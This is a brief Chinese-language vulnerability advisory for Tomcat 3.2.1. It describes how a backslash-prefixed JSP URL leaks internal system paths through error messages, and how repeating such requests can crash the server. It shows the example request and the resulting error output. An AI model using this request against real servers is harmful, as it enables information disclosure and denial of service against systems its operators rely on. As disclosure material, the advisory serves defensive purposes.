tomcat 暴露系统路径和拒绝服务漏洞

/ns/ld/softld/data/20010820102634.htm

Tomcat 是在 Apache 软件环境下开发的一个支持 JSP 和 Servlets 的软件。但是发现它存在两个漏洞:

1、攻击者提交这样的 URL 将能获得系统的一些路径信息:

Example:

http://host/\index.jsp

Error: 500
Location: /index.jsp
Internal Servlet Error:

org.apache.jasper.JasperException: Unable to compile class for JSP
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:482:
Method autenticate(java.lang.String) not found in class ENTERPRISE.login.
if(pubBean.autenticate(password) != 0)
^
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:664:
Method
Others methods...

2、拒绝服务漏洞
如果攻击者持续地发送这样类型的请求将能导致服务器完全崩溃

受影响系统:
Tomcat v3.2.1
测试环境:
Apache 1.3.19 (WinNT 4.0)